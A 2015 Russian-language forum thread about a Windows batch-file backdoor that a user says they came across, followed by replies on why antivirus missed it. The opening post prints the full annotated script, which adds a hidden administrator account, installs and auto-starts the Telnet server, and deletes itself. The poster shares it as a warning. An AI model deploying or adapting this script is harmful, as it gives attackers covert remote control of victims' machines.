Интересный батник

Антивирусное ПО, опыт борьбы с вирусами и прочее

Модератор: mike 1

Ответить
Аватара пользователя

Автор темы
Stinger
Интересующийся
Сообщения: 38
Зарегистрирован: 14 июн 2015, 15:11
Есть ответ: 1
Репутация: 4
Статус: Не в сети

Интересный батник

Сообщение Stinger » 10 июл 2015, 14:30


Мне попался интересный бэкдор, построен на стандартных средствах Windows. Не знаю, можно ли его назвать в таком случае вирусом, но он позволяет удаленно управлять устройством через протокол Telnet, а точнее получить доступ к терминалу. Также на него не реагируют антивирусы, так как он является пакетным файлом.
Вот сам "вирус":

Код: Выделить всё

1. @echo off                         --  отключение вывода на экран
2. chcp 866                            -- изменение кодировки страницы на 866
3. net user Name Password /add                -- создание учётной записи для протокола Telnet
4. net localgroup Ђ¤¬Ё­Ёбва в®ал Name /add          -- насколько я понял, это добавление в группу администраторов
5. net accounts /maxpwage:unlimited             -- строк действия учётной записи
6. reg add "HKLM\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\
SpecialAccounts\UserList" /v Name /t REG_DWORD /d 0 /f  -- специальная учётная запись
7. start "" /W pkgmgr /iu: "TelnetServer"             -- установка службы Telnet
8. ::tlntadmn config port=8080 sec=-NTLM             --редирект на другой порт (видимо для противостояния роутерам)
9. net localgroup "TelnetClients" Name /add          --добавление учётки в группу Telnet
10. sc config tlntsvr start = auto                -- автозапуск
11. net start telnet                         -- запуск службы
12. del %0                                                                    -- самоуничтожение


Рассчитан он на запуск от имени администратора и во время выполнения минуты 2 висит окно cmd. Конечно, это можно "профиксить" с помощью vbs.
И для атаки злоумышленнику нужен IP, так что думаю атака была направленной. Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.

Аватара пользователя

DesignerMix
Администратор
Администратор
Сообщения: 4492
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 172
Репутация: 551
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение DesignerMix » 10 июл 2015, 15:04


Stinger писал(а):Источник цитаты Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.

А почему антивирус должен был на него реагировать? Ведь в выполняемых командах нет ничего необычного, например какой-нибудь администратор вполне может написать подобный для удобства подключения к удаленным машинам.

Спасибо за интересную информацию!


c5f
Хранитель файлового архива
Хранитель файлового архива
Сообщения: 94
Зарегистрирован: 26 апр 2014, 20:59
Есть ответ: 3
Репутация: 27
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение c5f » 10 июл 2015, 20:13


Пользуйтесь linux или не пользуйтесь администраторской учётной записью в windows повсеместно. :ugeek:
В файловом архиве есть много схем ноутбуков и скоро будут добавляться другие полезные файлы. Заходите - downloads.php

Аватара пользователя

Автор темы
Stinger
Интересующийся
Сообщения: 38
Зарегистрирован: 14 июн 2015, 15:11
Есть ответ: 1
Репутация: 4
Статус: Не в сети

Интересный батник

Сообщение Stinger » 10 июл 2015, 20:59


Stinger писал(а):Источник цитаты управлять устройством через протокол Telnet, а точнее получить доступ к терминалу

А я разве писал что это бэкдор для Windows? В UNIX'ах тоже есть Telnet, а вообще протокол создан для удаленного кроссплатформенного управления, так что использование Linux вас не спасёт.

Отправлено спустя 16 минут 1 секунду:
Конечно, именно этот код работать не будет, но всё же его можно переработать и для Linux

Аватара пользователя

Endless8Space
Модератор
Модератор
Сообщения: 500
Зарегистрирован: 15 ноя 2014, 18:23
Есть ответ: 33
Репутация: 81
Откуда: Омск
Статус: Не в сети

Интересный батник

Сообщение Endless8Space » 12 июл 2015, 20:15


Stinger писал(а):Источник цитаты Конечно, именно этот код работать не будет, но всё же его можно переработать и для Linux

Stinger писал(а):Источник цитаты построен на стандартных средствах Windows

Аватара пользователя

Автор темы
Stinger
Интересующийся
Сообщения: 38
Зарегистрирован: 14 июн 2015, 15:11
Есть ответ: 1
Репутация: 4
Статус: Не в сети

Интересный батник

Сообщение Stinger » 12 июл 2015, 20:33


Я имел ввиду что можно реализовать "блокнотом", а служба Telnet, через которую и реализуется управление, есть и на линуксе.

Отправлено спустя 1 минуту 20 секунд:
И я же написал что можно написать (переделать) под Linux, так в чём проблема?

Аватара пользователя

Endless8Space
Модератор
Модератор
Сообщения: 500
Зарегистрирован: 15 ноя 2014, 18:23
Есть ответ: 33
Репутация: 81
Откуда: Омск
Статус: Не в сети

Интересный батник

Сообщение Endless8Space » 12 июл 2015, 21:22


Stinger, можно - можно переработать. Никаких проблем)

Аватара пользователя

Denis Akima
Новичок
Сообщения: 1
Зарегистрирован: 27 авг 2015, 12:40
Репутация: 0
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение Denis Akima » 08 сен 2015, 13:48


Stinger, можно уточнить четвёртую строку? У меня она некоректно отображается "4. net localgroup Ђ¤¬Ё­Ёбва в®ал Name /add "

Аватара пользователя

DesignerMix
Администратор
Администратор
Сообщения: 4492
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 172
Репутация: 551
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение DesignerMix » 08 сен 2015, 14:35


Denis Akima писал(а):Источник цитаты Ђ¤¬Ё­Ёбва в®ал

Здесь написано Адми­нистраторы. Автор темы кстати в комментариях к данной строке это и указал -- насколько я понял, это добавление в группу администраторов